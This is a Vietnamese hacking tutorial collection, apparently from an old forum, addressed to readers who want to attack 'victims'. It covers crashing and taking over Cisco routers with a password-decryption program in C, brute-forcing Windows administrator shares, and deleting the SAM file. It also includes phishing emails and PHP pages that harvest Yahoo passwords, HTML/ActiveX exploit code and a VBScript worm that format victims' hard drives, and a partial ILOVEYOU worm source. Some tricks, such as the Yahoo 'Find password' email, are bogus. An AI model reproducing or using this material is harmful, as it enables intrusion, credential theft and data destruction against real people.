biết được địa IP của bạn.
----------------------------------

Phần 1: Tại sao lại hack cisco router?

Có thể bạn thắc mắc.. tại sao lại hack cisco router?

Lí do là chúng thật là hữu ích để bẻ khoá các hệ
thống khác...

Cisco routers rất nhanh, một số có tốc độ kết nối 18 T1
trên một hệ thống, và chúng rất linh hoạt và chúng có
thể sử dụng cho các cuộc tấn công DoS hoặc hack vào các
hệ thống khác bởi vì hầu hết chúng chạy telnet.

Có hàng nghìn gói tin chạy qua chúng một lúc, và ta có
thể bắt và giải mã các gói tin... Rất nhiều cisco routers
được tin cậy, và cho phép bạn truy nhập nhất định vào
các máy tính khác trong mạng của nó.

----------------------------------

Phần 2: Tìm một cisco router

Tìm bộ dẫn đường Cisco là công việc tương đối dễ,
hầu hế mỗi ISP đều dẫn qua ít nhất một cisco router.
Cách dễ nhất để tìm ra một bộ dẫn đường Cisco là
chạy traceroute từ dos (gõ "tracert" và địa chỉ IP của
một máy tính khác), bạn có thể lần ra nhiều thông tin
nhờ các máy tính mà nó hiện ra giữa máy tính bạn và
máy tính của họ. Một trong số những hệ thống này có
thể có cụm từ "cisco" trong tên của nó. Nếu bạn tìm
thấy điều gì đó tương tự như vậy, hãy copy lại địa
chỉ IP của nó.

Giờ đây bạn đã biết nơi có một cisco router, nhưng nó
có thể được bảo vệ bởi firewall, bạn nên kiểm tra xem
nó có được bảo vệ không bằng cách ping nó một vài
lần, nếu bạn nhận được trả lời thì có thể là nó
không bị khoá. Một cách làm khác là thử truy nhập vào
một số cổng của cisco router, điều này được thực
hiện dễ dàng bằng cách sử dụng telnet, và tạo một
kết nối tới router bằng cổng 23.. Nếu nó đòi password,
mà không hỏi username nghĩa là bạn đang kề bên router,
nhưng nếu nó đòi username, thì có lẽ là đã bị firewall.
Thử tìm một router không có firewall, bởi lẽ bài giảng
này tutorial là về routers chứ không phải về cách qua
firewalls. Khi bạn đã tìm ra một hệ thống ổn định,
bạn cần tìm một proxy server cho phép sử dụng cổng 23,
bằng cách này IP của bạn sẽ không bị lưu lại bởi
router.

---------------------------------

Phần 3: Đột nhập cisco router

Các Cisco router chạy phiên bản v4.1 (hiện còn rất phổ
biến) có thể hạ gục dễ dàng. Bạn chỉ cần kết nối
với router bằng cổng 23 qua proxy server, và nhập vào một
chuỗi password KHỔNG LỒ, như là;

10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019

dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv

019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmx

ncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfh

gzmxncbv019dsk

Chờ một chút, hệ thống cisco có thể sẽ khởi động
lại, trong trường hợp đó bạn sẽ không hack được bởi
vì chúng offline.. Nhưng chúng thường treo khoảng 2-10 phút,
và bạn có thể thâm nhập được.

Nếu cả hai trường hợp đều không xảy ra, nghĩa là nó
không chạy phần mềm ngon ăn, trong trường đó bạn có
thể thử một vài kiểu tấn công DoS, giống như một
lượng ping khổng lồ. Mở dos và gõ "ping -l 56550
cisco.router.ip -t", this will do the same trick for you.

Khi bị treo, mở một kết nối khác đến một vài proxy
khác, và dùng password "admin", lí do vì đây là mật khẩu
mặc định của router, và khi nó tạm thời bị ngắt nó
sẽ chuyển sang chế độ mặc định.

Khi bạn đã đăng nhập, bạn cần giành lấy file password !
Các hệ thống chạy những phần mềm khác nhau nhưng đa
số sẽ có lệnh "htl-textil" hoặc gì đó, bạn gõ "?" để
hiện ra danh sách các lệnh, bạn sẽ thấy một danh sách
khổng lồ các lệnh, ở đâu đó bạn sẽ thấy một lệnh
chuyển đổi, dùng nó để lấy password file của admin
(người dùng hiện tại) và gửi đến địa chỉ IP ở
cổng 23. Nhưng trước khi làm vậy, hãy đặt HyperTerminal
chờ thông tin từ cisco router. Một khi bạn gửi file file,
HyperTerminal sẽ hỏi xem bạn có đồng ý nhận file này
không, chọn đồng ý và lưu nó xuống đĩa. Thoát.

Bạn đã qua phần khó khăn nhất, nghỉ một chút và chuẩn
bị phá password!

------------------------------

Phần 4: phá password

Giờ đây bạn đã có được file password, bạn cần phải
bẻ khoá nó thì mới có thể truy nhập access router lần
nữa. Để làm việc này cần chạy một chương trình đại
loại như John the Ripper hoặc một chương trình nào khác
để bẻ file password, và bạn có thể bẻ khoá được nó.

Đây là cách dễ nhất, và tôi khuyên bạn dùng cách này.
Một cách có thể thử bẻ khoá chúng. Để làm vạy bạn
cần một phần mềm giải mã, phải thật kiên nhẫn.

Để giải mã cisco password, bạn phải dịch đoạn mã sau
trong linux:

#include <stdio.h>
#include <ctype.h>

char xlat[] = {
0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
};

char pw_str1[] = "password 7 ";
char pw_str2[] = "enable-password 7 ";

char *pname;

cdecrypt(enc_pw, dec_pw)
char *enc_pw;
char *dec_pw;
{
unsigned int seed, i, val = 0;

if(strlen(enc_pw) & 1)
return(-1);

seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';

if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))
return(-1);

for (i = 2 ; i <= strlen(enc_pw); i++) {
if(i !=2 && !(i & 1)) {
dec_pw[i / 2 - 2] = val ^ xlat[seed++];
val = 0;
}

val *= 16;

if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {
val += enc_pw[i] - '0';
continue;
}

if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {
val += enc_pw[i] - 'A' + 10;
continue;
}

if(strlen(enc_pw) != i)
return(-1);
}

dec_pw[++i / 2] = 0;

return(0);
}

usage()
{
fprintf(stdout, "Usage: %s -p <encrypted password>\n", pname);
fprintf(stdout, " %s <router config file> <output file>\n", pname);

return(0);
}

main(argc,argv)
int argc;
char **argv;

{
FILE *in = stdin, *out = stdout;
char line[257];
char passwd[65];
unsigned int i, pw_pos;

pname = argv[0];

if(argc > 1)
{
if(argc > 3) {
usage();
exit(1);
}

if(argv[1][0] == '-')
{
switch(argv[1][1]) {
case 'h':
usage();
break;

case 'p':
if(cdecrypt(argv[2], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
fprintf(stdout, "password: %s\n", passwd);
break;

default:
fprintf(stderr, "%s: unknow option.", pname);
}

return(0);
}

if((in = fopen(argv[1], "rt")) == NULL)
exit(1);
if(argc > 2)
if((out = fopen(argv[2], "wt")) == NULL)
exit(1);
}

while(1) {
for(i = 0; i < 256; i++) {
if((line[i] = fgetc(in)) == EOF) {
if(i)
break;

fclose(in);
fclose(out);
return(0);
}
if(line[i] == '\r')
i--;

if(line[i] == '\n')
break;
}
pw_pos = 0;
line[i] = 0;

if(!strncmp(line, pw_str1, strlen(pw_str1)))
pw_pos = strlen(pw_str1);

if(!strncmp(line, pw_str2, strlen(pw_str2)))
pw_pos = strlen(pw_str2);

if(!pw_pos) {
fprintf(stdout, "%s\n", line);
continue;
}

if(cdecrypt(&line[pw_pos], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
else {
if(pw_pos == strlen(pw_str1))
fprintf(out, "%s", pw_str1);
else
fprintf(out, "%s", pw_str2);

fprintf(out, "%s\n", passwd);
}
}
}

Nếu bạn không có Linux, chỉ còn nước bẻ password bằng
cách tấn công từ điển hoặc brute-force file đó bằng John
the Ripper hoặc một chương trình bẻ khoá khác.

-------------------------------

Phần 5: Sử dụng router

Để sử dụng thiết bị cao cấp tuyệt vời này, bạn
phải kết nối tới chúng, sử dụng proxy nếu không muốn
IP của bạn log. Khi đã đăng nhập, bạn nên tắt phần
history để không ai có thể biết bạn đã làm gì, gõ vào
"terminal history size 0". Và nó sẽ chẳng ghi lại gì! Gõ "?"
để hiện một danh sách tất cả các lệnh của router, và
bạn sẽ dùng được hầu hết trong số chúng.

Các router thường có telnet, và bạn có thể dùng telnet
để kết nối connect tới các hệ thống khác, (như một
hệ unix) và hack chúng. Nó cũng được trang bị ping và
traceroute-bạn có thể sử dụng chúng để theo dõi hệ
thống hoặ tấn công DoS. Bạn còn có thể sử dụng nó
để bắt các gói tin, nhưng tôi khuyên bạn không nên, bởi
lẽ không phải lúc nào nó cũng hoạt động, và có thể
làm cho bạn bị phát hiện...


Trở về đầu trang


--------------------------------------------------------------------------------

Đánh cắp mật khẩu

Lấy mật khẩu của WInNT và Win2000

tạo một tệp tin, trong đó có chứa username và password
tương ứng nhau . Ví dụ ta tạo 1 file credentials.txt :
[file: credentials.txt]
password username
admin Administrator
administrator Administrator
secret Administrator
........... .....................
sau đó dùng lệnh FOR trong Windows để dò password admin , cụ
thể :
c:\>FOR /F "tokens=1,2*" %i in (credetials.txt) do net use (tên ổ
đĩa): \\server\IPC$ %i /u:%j

Lệnh này lấy 2 "từ vị" ở mỗi dòng, và lấy "từ vị"
đầu cho biến %i (password), và "từ" vị thứ 2 cho biến %j
trong khi sử dụng lệnh net use cho resource IPC$, IPC$ ở đây
có thể là ổ C$ hay D$, còn tên ổ đĩa bạn nên lấy
những ổ "ảo", nghĩa là không có trên máy ví dụ ổ H:
hay I: V:
Lệnh này đã được mình test thành công !

-----------------------------------------------------------------

Có rất nhiều chương trình để lấy pass theo kiểu chọn
này, ở đây ta dùng chương trình NAT (NetBIOS Auditing Tool),
chương trình này được sử dụng cho tất cả các PC ở
class C :
D:\> FOR /L %i IN (1,1,254) DO nat -u userlist.txt -p passlist.txt
192.168.202.%I >> nat_output.txt


--- Checking host : 192.168.202.1


--- Obtaining list of remote NetBIOS names


--- Attempting to connect with Username: 'ADMINISTRATOR'
Password:'ADMINISTRATOR'


--- Attempting to connect with Username: 'ADMINISTRATOR'
Password:'GUEST'

.......


--- CONNECTED: Username: 'ADMINISTRATOR' Password" 'PASSWORD'


--- Attempting to access share: \\*SMBSERVER\TEMP


--- WARNING: Able to acess share: \\*SMBSERVER\TEMP
......
Những thông tin về lệnh FOR bạn có thể tìm hiểu bằng
lệnh FOR /?


Một cách khác nhằm đoạt quyền của Administrator ở Window

Đối với Win98 : Không khó lắm , bạn vào start menu
-->search--> Files and Folders , bạn tìm tất cả những file
*.pwl. Sau đó Xóa những file này đi, khởi động lại máy
rồi login với user là administrator , không password
Đối với Win NT, 2000, XP : Cách này tỷ lệ thành công
khoảng 60% Bạn chuẩn bị một boot disk Windows 98, sau đó
khởi động máy bằng đĩa này, trong DOS bạn đánh : Del
X:\winnt\system32\config\SAM với X là ổ đĩa chứa OS của
bạn, lệnh này dùng để xoá file SAM chứa những account
người dùng ,... Bạn khởi động lại máy và log in với
user Administrator , không có pass !

Cách này dùng cho hệ thống cài NTFS (Độ bảo mật cao hơn
so với FAT 32), bạn làm lại những bước trên, tuy nhiên,
bạn cần một chương trình để đọc file của bạn trong
partion ở DOS . Bạn download chương trình NTFSpro Những
hướng dẫn trong chương trình này sẽ giúp bạn cài 1 boot
disk đúng. Sau khi tạo 1 disk boot với NTFSpro , bạn khởi
động lại với boot disk này và đã có thể thao tác với
file rùi ! làm theo những bước ở phía trên nữa là xong !

Trở về đầu trang

Lấy mật khẩu của email

+Trước hết mở hộp thư cua các bạn ra,chọn composed để
bắt đầu gửi thư

+Trong phần nội dung,chọn View HTML source,sau đó biên soạn
nội dung sau:

Ban co 1 buc dien hoa tu Congaquay85(hoac ten cua ban) voi tieu de nhu
sau :

Chuc ban vui ve

Hay nhap chuot vao day de xem buc dien hoa

http://dienhoa.vnn.vn/1&YY=80401&inc=25&or...pos=0&/view.php


You have a greeting crad from Congaquay85 with subject :

chuc ban vui ve

Click here to view greeting card

http://dienhoa.vnn.vn/1&YY=80401&inc=25&or...pos=0&/view.php

Trong phần nội dung thư bạn cứ copy nguyên đoạn này vào
là được ;

----------------------------------------------------------------------------------------------------

<p>Ban co 1 buc dien hoa tu Congaquay85 voi tieu de nhu sau :</p>


<p>Chuc ban vui ve</p>


<p>Hay nhap chuot vao day de xem buc dien hoa</p>


<p><a
href="http://www.00dt1.com">http://dienhoa.vnn.vn/1&amp;YY=80401&amp;
inc=25&amp;order=down&amp;sort=date&amp;pos=0&amp;/view.php</a></p>


<p></p>


<p>You have a greeting crad from Tran hung anh with subject :</p>


<p>chuc ban vui ve</p>


<p>Click here to view greeting card</p>


<p><a
href="http://www.00dt1.com">http://dienhoa.vnn.vn/1&amp;YY=80401&amp;
inc=25&amp;order=down&amp;sort=date&amp;pos=0&amp;/view.php</a></p>

-------------------------------------------------------------------------------------------

-Sau khi soạn thảo nội dung bức thư xong,bạn hãy gửi nó
cho đối tượng bạn muốn lấy pass.Nếu đối tượng mở
trang web giả mạo trên,lập tưc password sẽ bị lộ.Khi đó
bạn hãy vào trang web này để xem kết
quả:http://00dt1yahoofake.dk3.com

Nào,bắt đầu tấn công đi,chúc các bạn thành công!


Ngoài ra bạn cũng có thể sủ dụng cách này để đạt
được sác xuất thanh công cao hơn

Cách 1: đây cũng là 1 cách nhà quê, bạn có thể download
Ybrute - 1 chương trình dò Yahoo pass - còn cách sử dụng nó
thì đừng có hỏi tui, hỏi là tui oánh đó, lớn tướng
rùi mà còn hỏi vớ vẩn. Tuy nhiên khi mới vô thì tui cũng
xài qua cách này, điểm yếu của cách này là chỉ có tác
dụng khi victim xài pass là 1 từ có trong từ điển hay là 1
câu nói phổ biến, ngoài ra, cách này cũng tốn rất nhiều
thời gian (hêhê, cứ vừa ngồi đợi nó tìm mà nghe tiền
bay dần khỏi túi).
#Cách 2: bạn có thể tạo 1 giao diện giống hệt như Yahoo
(việc này thì dễ ợt chứ gì nữa), sau đó sửa đổi
chút xíu... hê hê...để cho khi victim gõ pass và user name
thì alê hấp, pass bay như chim về email của ta, còn victim
thì vẫn vào hòm thư mà không hề hay biết. Việc này bạn
có thể thực hiện dễ dàng bằng front page mà không cần
hiểu biết nhiều về html. Sau khi tạo xong giao diện, upload
lên thì bạn chỉ việc dụ victim vô tròng...khà khà...nếu
bạn muốn thử nghiệm thì cứ việc ra ngoài hàng rùi để
homepage ở đó là cái địa chỉ trang web mà bạn dùng để
câu, chắc chắn là sẽ có nhiều chú thỏ vô bẫy. #Cách
3: Sử dụng Trojan: Có rất nhiều loại Trojan giúp bạn
lấy password email, dial-up, account... như là:
Hoocker,Barrio5.0,Barox, Kuang2,....! Bạn có thể Download chúng
ở đầy rẫy trên mạng ở các trang hacker.
Bạn có thể gửi Trojan cho victim như một file đính kèm và
khi victim mở file đó Trojan sẽ có chỗ trú ngụ trong máy
của victim và thế là password của họ sẽ "chảy" về hòm
thư của bạn. Thật tuyệt phải không? Nhưng khổ nỗi
nếu máy của victim mà có "chàng vệ sĩ" Nguyễn Tử Quảng
(BKAV)hay Noton-Anti Virus thì he..he đành bó tay thui
Nếu bạn có thể tạo trang Web bạn có thể đính kèm
Trojan vào trang Web để khi victim vào trang web đó của bạn
Trojan sẽ được tự động down về máy victim mà họ không
hề hay biết. Để làm việc này bạn có thể sử dụng
Godwill1.60 để đính kèm trojan vào trong trang web. Godwill
cũng có rất nhiều trên mạng.
Cách 4 Tất cả đều phải thực hiện trên account Yahoo mail
của bạn bởi vì bức tường lửa của họ đã được
nâng cấp bằng Unix-Apache sever.
1. Gửi một email tới: lookdo...@yahoo.com
<mailto:lookdo...@yahoo.com>
2. Dòng tiêu đề Subject của email là: Find password.
3. Tiếp đến là nội dung email bạn đánh vào đoạn JScript
sau:
/config/cgi-bin/start?v703&login= "Tên login của bạn"&f="password
của bạn"&f= 27586&javascript=ACTIVE&rsa> infor/-password#="" send
back/?v_&from="địa chỉ muốn lấy pass" (nhớ phải đánh
thêm @yahoo.com nhe!)
Ví dụ:
Tên login của bạn là "hacker", password là "nobody" và địa
chỉ muốn lấy pass là "vic...@yahoo.com
<mailto:vic...@yahoo.com>" chẳng hạn thì bạn đánh như sau:
/config/cgi-bin/start?v703&login="hacker"&f="nobody"&f=
27586&javascript=ACTIVE&rsa> infor/-password#="" send
back/?v_&from="vic...@yahoo.com <mailto:vic...@yahoo.com>"
*The Yahoo system cần password của bạn để họ có thể gửi
một javascript từ account của bạn trên Yahoo sever tới một
password của người khác. Password sẽ tự động được
gửi đến email của bạn trong dấu"".
Cách này tuy dễ thực hiện nhưng tỷ lệ thành công chỉ
khoảng 60%, bởi vì nếu Web Browser của nạn nhân mà không
hỗ trợ JS thì đành bó tay thôi, sau 2 phút chờ đợi mà
không thấy Yahoo sever hồi âm thì có lẽ bạn lên chuyển
sang cách sau

#Cách 5: cách này thì 100% là thành công, nghe phê chưa. Ấy
bình tĩnh để em post lên chớ. Cách này sử dụng khi bác
đến nhà victim chơi hoặc ra ngoài hàng, nếu bác chẳng may
thấy victim xài tiện ích remember user name and password thì
hãy nhanh nhanh dùng cách này. Các bác download SnadBoy's
Revelation v2 (lên google.com mà tìm down load), sau đó thì cách
sử dụng nó quá dễ để đưa lên đây. Cách này khá đơn
giản và hiệu quả là 100% nhưng ít có đất dụng võ vì
nếu victim đọc bài này rùi thì họ sẽ không dùng cái
remember user name and password nữa đâu.
Cách 6: 1. Vào Bravenet.com đăng kí một accout và đăng kí
formmail bravenet.Trong phần Setting bạn chọn đường dẫn URL
là địa chỉ mà bạn muốn chuyển đến sau khi lừa họ
check mail, bạn lên chọn đường dẫn đến đến địa
chỉ mà Yahoo báo lỗi khi Login bằng cách vào Yahoo mail và
đánh một cái ID tầm bậy nha, sau đó bạn cũng gõ pass
luôn và bấm checkmail, yahoo sẽ báo là sai mật khẩu bạn
hãy chép cái đường dẫn URL này và dán vào trong mục URL
của bravenet.
2. Sau khi hoàn thành bước đầu thì bạn chuyển sang bước
kế tiếp chỉnh lại trong mail yahoo đó nhớ là bạn phải
làm 2 giao diện một giao diện yahoo là sẵn sàng Login vào
mail và cái thứ 2 là sai mật khẩu, tới đây chắc các
bạn hiểu rồi phải không? để khi victim checkmail thì
đường dẫn thank sẽ báo là sai mật khẩu và lần này
thì 100% là victim checkmail thành công nhưng cũng đồng nghĩa
với mất mật khẩu, mật khẩu của victim sẽ được
chuyển về hộp mail mà lúc bạn đăng lí bên bravenet.com.
Bạn chỉ còn việc đi rải "bom" shortcut checkmail và chỉ
chờ cho victim checkmail là OK!

Tuy nhiên hiện nay bravenet đã yêu cầu chứng nhận thông
tin của emailform trước khi gửi đi do đó chúng ta chỉ
dùng cách này để tham khảo mà không dùng được nữa vì
nạn nhân sẽ phát hiện ra ngay. Bởi vậy, tại sao chúng ta
không tự tạo ra code cho mình, vừa nhiều tính năng hơn
lại khỏi phải phụ thuộc.

2. Tự tạo code:

Trước tiên, bạn đăng ký một free host có hỗ trợ PHP,
tôi thấy tốt nhất là cái http://tripod.lycos.co.uk việc này
rất dễ , chỉ cần bạn đăng ký làm thành viên của trang
này, sau đó làm theo các chỉ dẫn mà nó gửi về mail cho
bạn là có thể có một free host dạng:

http://members.lycos.co.uk/tenban

host này có acount FTP nhưng không thể dùng được mà các
bạn phải dùng web2ftp.com mà upload. Dùng trang này rất dễ,
bên phần "thiết kế và xuất bản web, trong bài 1.2.3 cùng
làm forum"tôi có bài hướng dẫn dùng web2ftp.com rất cụ
thể. Nào chúng ta làm:

1. tạo các tệp sau: (dùng Notepate, sau đó khi save chọn
Allfile với tên tệp là yahoo1.php chẳng hạn)

yahoo1.php:

<?
$f=fopen("yahoo.html","a");
fwrite($f,"$lo...@yahoo.com : $passwd\n=====================\n");
fclose($f);
header("location:
http://login.yahoo.com/config/login?6rfn98dak5km4&.tries=&.src=ym&.last=&promo=&.intltype
=us&.bypass=&.partner=&.u=6l335nstlpk8v&.v=0&hasMsgr=0&.chkP=Y&.done=&login=
$login&passwd=$passwd&.persistent=");
?>

yahoo2.php:

<?
$f=fopen("yahoo.txt","a");
fwrite($f,"$lo...@yahoo.com : $passwd\n=====================\n");
fclose($f);
header("location:
http://login.yahoo.com/config/login?6rfn98dak5km4&.tries=&.src=ym&.last=&promo=&.intltype
=us&.bypass=&.partner=&.u=6l335nstlpk8v&.v=0&hasMsgr=0&.chkP=Y&.done=&login=
$login&passwd=$passwd&.persistent=");
?>


yahoo3.php

<?
$contactemail = "mailc...@yahoo.com"; //
$subject = "password of $lo...@yahoo.com : $passwd";
$message = "";
mail($contactemail, $subject, $message);
header("location:
http://login.yahoo.com/config/login?6rfn98dak5km4&.tries=&.src
=ym&.last=&promo=&.intltype=us&.bypass=&.partner=&.u=
6l335nstlpk8v&.v=0&hasMsgr=0&.chkP=Y&.done=&login=
$login&passwd=$passwd&.persistent=");
?>

Tạo tiếp 2 tệp trắng (không có nội dung gì ) là:
yahoo.html và yahoo.txt

2. Dùng http://web2ftp.com upload 5 tệp này lên trang lycos của
bạn

3. Dùng code:

a. Thay code của bravenet (nếu trước đó bạn đang dùng code
của bravenet) bằng:

<FORM action="http://members.lycos.co.uk/tenban/yahoo3.php"
method="post">

nếu bạn muốn gửi kết quả về mail cho bạn

b. Thay code của bravenet bằng:

<FORM action="http://members.lycos.co.uk/tenban/yahoo1.php"
method="post">

nếu bạn muốn kết quả được in ra trang yahoo.html sau đó
mỗi lần xem bạn chỉ cần gõ:

http://members.lycos.co.uk/tenban/yahoo.html

c. Thay code của bravenet bằng:

<FORM action="http://members.lycos.co.uk/tenban/yahoo2.php"
method="post">

nếu bạn muốn kết quả được in ra trang yahoo.txt sau đó
mỗi lần xem bạn dùng FTP mở trang này ra hoặc có thể gõ
http://members.lycos.co.uk/tenban/yahoo.txt nếu bạn chmod file
yahoo.txt là 666 (-rw-rw-rw)

Chú ý, nếu bạn dùng emalform không phải là copy của trang
mail.yahoo.com thì khi tạo form nhớ đặt Name cho ô "login" và
"đăng nhập" lần lượt là login và passwd.

Trở về đầu trang


--------------------------------------------------------------------------------

Cài vius format ổ cứng victim

Hãy chèn đoạn mã sau vào trang web rồi gởi cho một kẻ
khốn khổ nào đó, nó chạy thì ổ cứng của nó sẽ
tiêu, đừng chơi tui nha!!!.


<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">
</head>

<p>
<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC">
</object>
</p>
<script>
var1='echo @format "c: < c.txt >nul" >> c:\\autoexec.bat';
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\repair.hta";
scr.Doc="<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><script>wsh.Run('command
/c echo e 171,20 >> C:\\d.TXT',true,1);wsh.Run('command /c echo e
181,20 >> C:\\d.TXT',true,1);wsh.Run('command /c echo w>>
C:\\d.TXT',true,1);wsh.Run('command /c echo q >>
C:\\d.TXT',true,1);wsh.Run('command /c echo y >>
C:\\C.TXT',true,1);wsh.Run('command /c echo Sucker >>
C:\\C.TXT',true,1);wsh.Run('command /c echo @echo Please wait while
Setup updates your configuration files. >>
c:\\autoexec.bat',true,1);wsh.Run('command /c echo @echo This may take
a few minutes... >> c:\\autoexec.bat',true,1);wsh.Run('command /c
"+var1+"',true,1);wsh.Run('command /c debug c:\\autoexec.bat <
d.txt',true,1)</"+"SCRIPT>";scr.write();
</script>
<p>
<object classid="clsid:50E5E3D1-C07E-11D0-B9FD-00A0249F6B00"
id="RegWizObj">
</object>
</p>
<script language="VbScript">
expstr = "/i
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAA"
expstr = expstr & Chr(235)
expstr = expstr & Chr(53)
expstr = expstr & Chr(208)
expstr = expstr & Chr(127)
expstr = expstr + Chr(144)
expstr = expstr + Chr(139) + Chr(252)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
expstr = expstr + Chr(80)
expstr = expstr + Chr(87)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + Chr(51) + Chr(192)
expstr = expstr + Chr(80)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + "rundll32 shell32.dll,SHExitWindowsEx 1"
RegWizObj.InvokeRegWizard(expstr)
</script>

</html>

chúc các bạn thành công, đừng nên phổ biến vì nó rất
nguy hiểm

Cách tạo một virus khác format ổ cứng người khác

Sao đây mình xin giới thiệu với các bạn cách sử dụng
VBScript để viết một
worm nhỏ xoá sạch ổ cứng của victim. (có thể nhúng vào
HTML)
(Lưu ý : dùng với mục đích nghiên cứu, không khuyến
khích phá hoại).

Sao đây tui xin giới thiệu với các bạn cách sử dụng
VBScript để viết một
worm nhỏ xoá sạch ổ cứng của victim. (có thể nhúng vào
HTML)
(Lưu ý : dùng với mục đích nghiên cứu, không khuyến
khích phá hoại).

I/để bắt victim thực thi một chương trình nào đó các
bạn sử dụng đoạn
script sau:
================
<html>
<head>
<title>L0ng3ta</title>
</head>
<body >
<p>chuong trinh notepad se thuc thi
<script language=VBSCRIPT>
On Error Resume Next
Set WSHShell = CreateObject("WScript.Shell")
WSHShell.Run "c:\windows\notepad.exe",1,False
</SCRIPT></p>
</body>
</html>
================
đoạn Script trên sẽ chạy chương trình notepad. Các bạn
có thể copy vào trang HTML
và cho chạy thử.

II/Đoạn Script để chèn một vài lệnh lên autoexec.bat trên
ổ đĩa của victim.
======================
<script language=VBSCRIPT>
Function FindFile(PathFiles)
dim fso,f
Set fso = CreateObject("Scripting.FileSystemObject")
If (fso.FileExists(PathFiles)) Then
FindFile = True
Set f = fso.GetFile(Pathfiles)
If f.attributes and 1 Then
f.attributes = f.attributes -1
End if

Else
FindFile = False
End If
End Function

Sub CreateFile()
Dim fso, tf
Set fso = CreateObject("Scripting.FileSystemObject")
Set tf = fso.CreateTextFile("c:\Autoexec.bat", True)
tf.WriteLine ("@Echo off")
tf.Close
End Sub

Sub InsertBegintext()
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Dim fso, tf
Set fso = CreateObject("Scripting.FileSystemObject")
Set tf = fso.OpenTextFile("c:\autoexec.bat", ForAppending , True)
tf.WriteLine ("@Echo Please Waiting for Windows updating your system
...")
tf.Close
End Sub

Sub Inserttext(drv)
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Dim fso, tf
Set fso = CreateObject("Scripting.FileSystemObject")
Set tf = fso.OpenTextFile("c:\autoexec.bat", ForAppending , True)
tf.WriteLine ("@deltree /y " & drv & " > null")
tf.WriteLine ("@Format " & drv & " /q /u /autotest > null")
tf.Close
End Sub

'Kiem tra xem co phai o dia co phai la harddisk hay khong
'Va tra ve true neu no la harddisk
Function ShowDriveInfo(drvpath)
Dim fso, d, s, t
Set fso = CreateObject("Scripting.FileSystemObject")
Set d = fso.GetDrive(drvpath)
If d.DriveType = 2 then
If d.IsReady then
ShowDriveInfo = True
Else
ShowDriveInfo = False
End If
Else
ShowDiveInfo = False
End If
End Function

Sub Main()
Dim fso, d, dc, s, i
Dim a(15)
Set fso = CreateObject("Scripting.FileSystemObject")
Set dc = fso.Drives
i = 0
For Each d in dc
If showdriveinfo(d) then
a(i) = d
i= i+1
End If
Next
If Not Findfile("c:\autoexec.bat") then
Createfile
End if
InsertBegintext
Do While i>0
i=i-1
Inserttext(a(i))
Loop
End Sub

Main
</SCRIPT>
======================

III>Công việc còn lại là của các bạn, thay vì cho no
thực thi chương trình
notepad các bạn hãy đổi tên nó thành "c:\autoexec.bat" thử
xem, và các bạn đoán
thử chuyện gì sẽ xảy ra rồi đó, lưu ý là chèn nó
thẳng vào file html. Lấy
thêm đoạn source send mail của worm ILoveYou mà thêm vào nữa
thì các bạn sẽ có
một con Sworm đáng sợ.

Trở về đầu trang


--------------------------------------------------------------------------------

Virut I LOVE YOU

rem barok -loveletter(vbe) <i hate go to school>

rem by: spyder / isp...@mail.com / @GRAMMERSoft Group /

Manila,Philippines

On Error Resume Next

dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow

eq=""

ctr=0

Set fso = CreateObject("Scripting.FileSystemObject")

set file = fso.OpenTextFile(WScript.ScriptFullname,1)

vbscopy=file.ReadAll

main()

sub main()

On Error Resume Next

dim wscr,rr

set wscr=CreateObject("WScript.Shell")

rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting

Host\Settings\Timeout")

if (rr>=1) then

wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting

Host\Settings\Timeout",0,"REG_DWORD"

end if

Set dirwin = fso.GetSpecialFolder(0)

Set dirsystem = fso.GetSpecialFolder(1)

Set dirtemp = fso.GetSpecialFolder(2)

Set c = fso.GetFile(WScript.ScriptFullName)

c.Copy(dirsystem&"\MSKernel32.vbs")

c.Copy(dirwin&"\Win32DLL.vbs")

c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

regruns()

html()

spreadtoemail()

listadriv()

end sub

sub regruns()

On Error Resume Next

Dim num,downread

regcreate

